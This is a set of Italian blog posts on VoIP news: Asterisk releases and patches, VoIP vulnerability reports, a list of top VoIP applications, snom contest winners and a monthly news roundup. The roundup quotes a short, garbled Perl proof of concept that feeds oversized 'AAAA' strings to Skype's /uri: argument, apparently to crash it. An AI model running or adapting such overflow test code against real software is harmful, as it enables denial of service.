Mentre si sta cercando di arrivare al FreeRunner, una decina di sviluppatori hanno portato Asterisk, versione 1.4.17,  su OpenMoko.

Voip Security Blog riporta una serie di video creati da VoipShiled in cui si mostrano alcuni attacchi DoS e man-in-the-middle

http://www.youtube.com/watch?v=x56j2BRkUME
http://www.youtube.com/watch?v=S-3CW-epFBM
http://www.youtube.com/watch?v=OLwzef_OZzA

La stessa ditta ha poi scoperto un centinaio di vulnerabilita’  (rese pubbliche apparentemente 44) di vari sistemi VoIP, in particolare Cisco, Avaya e Nortel; VOIPSA ha pubblicato un articolo in cui si raccolgono le vulnerabilita’ dei primi mesi dell’anno.

Un intervista a Mark Collier (VoIPSecurityBlog, CTO di SecureLogix e membro di VOIPSA) fatta al VoiceCon ad orlando sullo stessa tema e’ dispobile su YouTube .

Infine torniamo ad Asterisk, dato che pochi giorni fa sono state rilasciate delle patch per delle vulnerabilita che affliggono tutte le versioni, determinado cosi il rilascio della 1.2.28, 1.4.19.1 e 1.6.0-beta8.

Digium il 24 Gennaio socorso aveva annunciato assieme ai nuovi prodotti,
l’introduzione di una nuova tecnologia chiamata VoiceBus nei propri chip, cosi descritta da Bill Miller:

“Digium’s VoiceBus technology enables the development of high performance PCI compatible telephony interface cards for a variety of applications,”

“Moving forward, this architecture will be used across all Digium analog and digital telephony solutions.” » Read the rest of the entry..

Pausa godareccia a Bruxelles, per il Fosdem (Free and Open Source Software Developpers’ European Meeting

VirtualHosting Blog riporta una lista delle milgiori 50 applicazioni VoIP.

SIP Proxies

1. OpenSer
2. VOCAL
3. partySIP
4. SIP Express Router
5. MjServer
6. OpenSBC
7. sipX

SIP Clients

8. Linphone
9. PhoneGaim
10. OpenWengo
11. Cockatoo
12. Minisip
13. OpenZoep
14. Shtoom
15. Twinkle
16. YeaPhone

H.323 Clients

17. YATE
18. FreeSWITCH
19. Eikga
20. OpenPhone
21. XMeeting

IAX Clients

22. IAXComm
23. Kiax
24. YakaPhone
25. SFLPhone

PBX and IVR Platforms

26. Asterisk
27. OpenPBX
28. GNU Bayonne
29. CT Server
30. sipX PBX
31. Trixbox
32. Evolution PBX

Stacks and Libraries

34. OpenSIPStack
35. The GNU oSIP Library
36. Twisted
37. Verona
38. PJSIP
39. eXosip
40. Vovida SIP
41. reSIProcate

Developers

42. SIPFoundry
43. Pingtel
44. Vovida
45. Sangoma
46. Digium

Miscellaneous

47. SIP Thor
48. MobiCents
49. Aradial
50. Lintad

Rispetto a molte altre marche sono sicuramente degli ottimi telefoni, certo, di recente sono state scoperte alcune nuove falle di sicurezza da GNUCitizen riguardanti l’interfaccia di amministrazione, tuttavia c’e’ da dire che alcuni “problemi” sono dovuti più che altro alle cattive impostazioni di default, ma quale sistema di default puo’ definirsi sicuro?!

Sempre la SNOM qualche tempo fa ha indetto lo “snom XML context”, con vari premi e fornendo alcune idee ed  esempi da cui partite.

Di seguito la lista dei vincitori, con le relative applicazioni:

Business category:

• XMLConference by Andreas NeugebauerXmlConference consiste in una Servler scritta per gli snom 3xx con firmware 7.2.3 o superiore ed utilizzale AMI per mostrare le informazioni reltive alle conferenze permettendo di interagire attraverso il telefono setsso.
• EyeOfSnom by Axel JägerUn visualizzatore di immagni richiede firmware 7.2.1 o superiore.

• InterAsterisk by Stefan WillmerothL’applicazione offre varie funzionalita’, dalla rubrica centralizzata,  alla lista delle conference room o dei telefoni occupati. Scritta in PHP.
• Fonzo by Pablo BeyenUn’altra rubrica centralizzata questa volta pero’ scritta in ruby

Lifestyle category:

• SnomSnake by David KreitschmannChe dire, ecco il filmato.
• LunchBreak by Stefan WillmerothUn sistema per organizzare la pausa pranzo, in cui i colleghi posso joinare l’invito che avete inviato, simpatica l’idea.
• TTT by Pablo BeyenTic-Tac-Toe multi player
• Calculator by Siggi LangaufPoteva mancare la calcolatrice?!

Tutte le applicazioni sono scaricabili delle rispettive pagine.

Di recente sono stati pubblicati interessanti documenti relativi alla sicurezza del VoIP (un buon punto di partenza puo’ essere voipsa).

Riporto di seguito, quelli che sono stati definiti i 9 pericoli e vulnerabilita’ del VoIP. L’articlo o le slide mostrate indicano alcuni reali pericoli, a cui siamo esposti attraverso la tecnologia VoIP, sicuramente, non sono tutti, ma e’ un buon punto di partenza per indagare sulla secirezza della vostra rete telefonica.

• Remote eavesdropping
• VoIP hopping
• Vishing
• VoIP SPAM
• Toll fraud
• Skype worms
• Voip over Wifi
• Lack of robust implementation
• Weak default settings

Personalmente, per quanto Skype sia voice over ip, lo escluderei dalla lista, in quanto il suo problema e’ specifico all’implementazione e non relativo alla tecnologia VoIP; cosi come il wifi ed il problema delle configurazioni dei default, in quanto piu generici.

Rimanendo in tema sicurezza vi consiglio l’ascolto di un interessate podcast BlueBox #57 su problemi spcifici di Asterisk e non solo.

Delle altre slide mostrare ad Astricon 2007 le potete leggere su slideshare.

per chi come me fosse stato in vacanza occupandosi di tutto tranne che di voip, ecco una breve panoramica su quanto e’ accaduto nel mondo di asterisk nel frattempo.

30 Luglio - nella mailing list -users di Asterisk e’ copraso un Load balacer per IAX2, che non necessita di Asterisk. Al momento a detta dell’autore e’ in fase di sviluppo, ma da test fatti e’ gia possibile utilizzarlo.
http://www.gradwell.com/tmp/iax_proxy.tar.gz

1 Agosto - SiVuS , e’ stata rilasciata la nuova versione 1.10 per Linux, uno scanner di vulnerabilita SIP.

3 Agosto - [OT] Google Phone, ennesimo annuncio, chissa…

5 Agosto - AsterCRM, e’ nata un alternativa al famoso SugarCRM, pensata per Asterisk, le funzionalita‘ sono ovviamente minori, anche se al momento gia mostra Pop-up when dial in, PoP-up when dial out, Auto-complete, Click-to-dial, Transfer e Exension manager.

7 Agosto - Asterisk 1.2.24 and 1.4.10 released, nel comunicato si consiglia l’upgrade a chi utilizza chan_skinny, che soffriva dell’ennesimo bug. Per il resto sono stati effettuati numerosi fix, in particolare sul chan IAX2.

8 Agosto - chan_mobile, in asterisk_addons. Attraverso questo chan e’ possibile utilizzare cellulari bluetooth come FXO ed il microfono come FXO, bello no

14 Agosto - Iaxclient Branching off 2.0, e’ stato aperto il ramo 2.0 contenente il supporto video in modo ufficiale, prima era presente solo in svn.

15 Agosto - Lightweight Home Security with Indigo and Asterisk, ovvero domotica targata Asterisk,

16 Agosto - [OT ma doveroso] 14 Compleanno di Debian

17 Agosto - Skype, caduto! Le dichiarazioni uffciali negano la possibilita’ di un attacco, ma non molto tempo prima e’ stato pubblicato questo… che abbia influito?!

#!/usr/bin/perl
# Simle Code by Maranax Porex ;D
# Ya Skaypeg!!

for ($i=256; $i>xCCCCC; $i=$i+256){
$eot=’AAAA’ x $i;
call_sp();
}
exit;

sub call_sp(){
$str=â€?\â€?C:\\Program Files\\Skype\\Phone\\Skype.exe\â€? \â€?/uri:$eot\â€?”;
}

Recentemente, SMC ha fatto notizia per la violazione della GPL in uno dei loro prodotti, il WSKP100.

Il telefono WIFI, e’ commercio in versione Skype e SIP al doppio del prezzo, dei ragazzi hanno trovato come comprare quello skype e trasformarlo in SIP

In italia l’ho visto in vendita da Expansys, ad un prezzo pero importante, considerando che da Mediaworld il Gigaset C450IP (che e’ sip) costa 99e.

Vi sono varie possibilita’ per strutturare un sistema HA per Asterisk. Quello che vi presentero’ oggi con un micro HowTo e’ sicuramnte una delle piu veloci ed a mio giudizio efficaci.

A dire il vero il grosso del lavoro lo fa uCarp, (Common Address Redundancy Protocol) software portato dal OpenBSD, alternativa al VRRP di Cisco.

» Read the rest of the entry..